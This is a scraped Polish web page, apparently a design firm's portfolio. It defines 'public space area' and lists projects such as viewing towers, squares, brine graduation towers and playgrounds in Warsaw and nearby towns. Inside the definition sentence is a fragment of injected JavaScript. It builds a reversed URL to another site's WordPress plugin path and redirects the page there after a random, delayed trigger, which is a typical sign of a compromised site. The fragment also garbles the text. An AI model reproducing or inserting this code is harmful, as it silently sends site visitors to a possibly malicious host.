informacje *>

Definicja

„obszar przestrzeni publicznej” − należy przez toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to rozumieć obszar o szczególnym znaczeniu dla zaspokojenia potrzeb mieszkańców, poprawy jakości ich życia i sprzyjający nawiązywaniu kontaktów społecznych ze względu na jego położenie oraz cechy funkcjonalno- przestrzenne, określony w studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy;

WIEŻA WIDOKOWA

WIEŻA WIDOKOWA W MALAWIE

WIEŻA WIDOKOWA
SKWER W MALAWIE

SKWER REKREACYJNO- INTEGRACYJNY W MALAWIE

SKWER W MALAWIE
TĘŻNIA WAWER

TĘŻNIA SOLANKOWA NA TERENIE SPORTOWO- REKREACYJNYM „SYRENKA”  

TĘŻNIA WAWER
PLAC ZABAW "NEMO"

PLAC ZABAW W MALAWIE

PLAC ZABAW "NEMO"
POMNIK NA URSYNOWIE

POMNIK PIELGRZYMKI RYCERZA A. CIOŁKA

POMNIK NA URSYNOWIE
Tężnia w Parku Picassa

TĘŻNIA W PARKU P.PICASSA

Tężnia w Parku Picassa
SKWER SYBIRAKÓW WARSZAWA

REWITALIZACJA SKWERU SYBIRAKÓW

SKWER SYBIRAKÓW WARSZAWA
PLAC ZABAW

TEREN REKREACYJNY Z PLACEM ZABAW, UL.PALA TELEKIEGO

PLAC ZABAW
ZAGOSPODAROWANIE PRZY ZARUBY

ZAGOSPODAROWANIE TERENU PRZY BUDYNKU, UL. ZARUBY

ZAGOSPODAROWANIE PRZY ZARUBY
AMFITEATR W PARKU HERBERTA

ZADASZENIE SCENY W PARKU HERBERTA

AMFITEATR W PARKU HERBERTA
Wiat Grillowa

WIATA GRILLOWA NA TERENIE REKREACYJNYM W GMINIE KRASNE

Wiat Grillowa
MOBILNY LOF

WĘZEŁ PRZESIADKOWY "MOBILNY LOF"

MOBILNY LOF
TĘŻNIA SOLANKOWA ZIELONKA

TĘŻNIA SOLANKOWA ZIELONKA

TĘŻNIA SOLANKOWA ZIELONKA